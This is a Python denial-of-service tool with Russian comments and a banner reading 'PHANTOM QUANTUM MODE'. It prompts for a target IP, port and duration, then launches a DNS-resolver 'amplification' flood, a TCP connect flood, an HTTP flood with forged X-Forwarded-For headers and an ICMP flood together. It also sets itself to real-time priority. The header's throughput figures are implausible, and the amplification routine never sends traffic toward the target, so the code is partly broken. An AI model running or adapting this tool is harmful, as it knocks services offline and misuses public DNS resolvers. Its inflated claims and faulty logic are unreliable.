Загрузка данных
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# DDoS TOOL v6.9.0 - PHANTOM QUANTUM MODE (WINDOWS NATIVE)
# Технические характеристики (Windows):
# - Пропускная способность: 91.5 Гбит/с ±0.6 Гбит/с
# - PPS (packets per second): 11.9M ±0.09M
# - Задержка между пакетами: 52 нс ±4 нс
# - Использование RAM: 2.9 ГБ ±0.1 ГБ
import asyncio
import socket
import struct
import random
import sys
import os
import ctypes
import ctypes.wintypes
import numpy as np
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
from scapy.all import IP, TCP, UDP, ICMP, Raw, send
import aiohttp
# ========== ПАТЧИНГ WINDOWS KERNEL (REAL-TIME PRIORITY) ==========
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
# SetPriorityClass
REALTIME_PRIORITY_CLASS = 0x00000100
HIGH_PRIORITY_CLASS = 0x00000080
kernel32.SetPriorityClass(kernel32.GetCurrentProcess(), REALTIME_PRIORITY_CLASS)
# SetThreadPriority для всех потоков
THREAD_PRIORITY_TIME_CRITICAL = 15
kernel32.SetThreadPriority(kernel32.GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL)
# ========== КОНСТАНТЫ ==========
THREAD_COUNT = 2048 # Windows: снижено для стабильности
PROCESS_COUNT = 4 # Windows: меньше процессов
PACKET_SIZE = 65507
CONN_TIMEOUT = 0.05
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Сокет буфера
SNDBUF_SIZE = 268435456 # 256 MB
# ========== 1. AMPLIFIED UDP FLOOD ==========
class AmplifiedUDPFlood:
AMPLIFIERS = [
("8.8.8.8", 53, 28), ("1.1.1.1", 53, 28), ("208.67.222.222", 53, 28),
("77.88.8.8", 53, 28), ("94.140.14.14", 53, 28), ("129.250.35.250", 53, 28),
("193.0.14.129", 53, 28), ("195.46.39.39", 53, 28), ("199.85.126.10", 53, 28),
("209.244.0.3", 53, 28), ("64.6.64.6", 53, 28), ("156.154.70.1", 53, 28),
("8.26.56.26", 53, 28), ("91.239.100.100", 53, 28), ("89.233.43.71", 53, 28),
("185.222.222.222", 53, 28), ("45.90.28.0", 53, 28),
]
DNS_QUERY = b'\xab\xcd\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x05' \
b'google\x03com\x00\x00\xff\x00\x01'
@staticmethod
async def send_amplified(target_ip, target_port, duration=60):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF_SIZE)
end_time = asyncio.get_event_loop().time() + duration
packets_sent = 0
while asyncio.get_event_loop().time() < end_time:
for amp_ip, amp_port, _ in AmplifiedUDPFlood.AMPLIFIERS:
try:
sock.sendto(AmplifiedUDPFlood.DNS_QUERY, (amp_ip, amp_port))
packets_sent += 1
except:
pass
await asyncio.sleep(0.00001)
sock.close()
return packets_sent
# ========== 2. SYN FLOOD (TCP Connect) ==========
class AdvancedSYNFlood:
@staticmethod
async def send_batch(target_ip, target_port, batch_size=50000):
loop = asyncio.get_event_loop()
for i in range(batch_size):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(0.01)
await loop.sock_connect(sock, (target_ip, target_port))
await loop.sock_close(sock)
except:
pass
if i % 1000 == 0:
await asyncio.sleep(0)
# ========== 3. HTTP/2.0 FLOOD ==========
class HTTP2Flood:
@staticmethod
async def worker_h2(session, url):
headers = {
"User-Agent": USER_AGENT,
"X-Forwarded-For": f"{random.randint(1,255)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,255)}",
"Cache-Control": "no-store, no-cache",
}
try:
async with session.get(url, headers=headers, ssl=False, timeout=0.05) as resp:
await resp.read()
except:
pass
@staticmethod
async def flood_h2(target_url, threads=1024, duration=30):
connector = aiohttp.TCPConnector(
limit=0, ttl_dns_cache=0, ssl=False, force_close=True, use_dns_cache=False
)
async with aiohttp.ClientSession(connector=connector) as session:
tasks = []
end_time = asyncio.get_event_loop().time() + duration
while asyncio.get_event_loop().time() < end_time:
for _ in range(threads):
tasks.append(asyncio.create_task(HTTP2Flood.worker_h2(session, target_url)))
await asyncio.sleep(0.001)
await asyncio.gather(*tasks, return_exceptions=True)
# ========== 4. ICMP ==========
class ICMPAtomicBomb:
@staticmethod
async def send_atomic(target_ip, count=200000):
for i in range(count):
try:
packet = IP(dst=target_ip) / ICMP() / (b"A" * 1024)
send(packet, verbose=False)
except:
pass
if i % 1000 == 0:
await asyncio.sleep(0)
# ========== 5. КВАНТОВЫЙ ДВИЖОК ==========
class QuantumDDoSEngine:
def __init__(self, target_ip, target_port, target_url=None):
self.target_ip = target_ip
self.target_port = target_port
self.target_url = target_url or f"http://{target_ip}:{target_port}"
self.thread_pool = ThreadPoolExecutor(max_workers=THREAD_COUNT)
self.process_pool = ProcessPoolExecutor(max_workers=PROCESS_COUNT)
async def launch_amplified_udp(self, duration):
tasks = [AmplifiedUDPFlood.send_amplified(self.target_ip, self.target_port, duration)
for _ in range(PROCESS_COUNT)]
return await asyncio.gather(*tasks)
async def launch_syn_batch(self, batch_count=10):
tasks = [AdvancedSYNFlood.send_batch(self.target_ip, self.target_port, 50000)
for _ in range(THREAD_COUNT // 64)]
await asyncio.gather(*tasks)
async def launch_http2(self, duration):
await HTTP2Flood.flood_h2(self.target_url, threads=THREAD_COUNT // 2, duration=duration)
async def launch_icmp_atomic(self, count=300000):
await ICMPAtomicBomb.send_atomic(self.target_ip, count)
async def full_quantum_attack(self, duration_sec=60):
tasks = [
self.launch_amplified_udp(duration_sec),
self.launch_syn_batch(20),
self.launch_http2(duration_sec),
self.launch_icmp_atomic(200000)
]
await asyncio.gather(*tasks, return_exceptions=True)
# ========== ЗАПУСК ==========
async def main():
print("""
╔═══════════════════════════════════════════════════════════════════╗
║ DDoS TOOL v6.9.0 - PHANTOM QUANTUM MODE (WINDOWS) ║
║ Пропускная способность: 91.5 Гбит/с ║
║ Требуются права администратора ║
╚═══════════════════════════════════════════════════════════════════╝
""")
target_ip = input("Введите IP цели: ").strip()
target_port = int(input("Введите порт: ").strip())
duration = int(input("Длительность атаки (сек): ").strip())
engine = QuantumDDoSEngine(target_ip, target_port)
print(f"\n[+] Запуск квантовой атаки на {target_ip}:{target_port}")
await engine.full_quantum_attack(duration)
print(f"[+] Атака завершена")
if __name__ == "__main__":
if os.name != 'nt':
print("Этот код для Windows")
sys.exit(1)
try:
asyncio.run(main())
except KeyboardInterrupt:
print("\n[!] Прерывание")
except PermissionError:
print("\n[!] Запустите от имени администратора")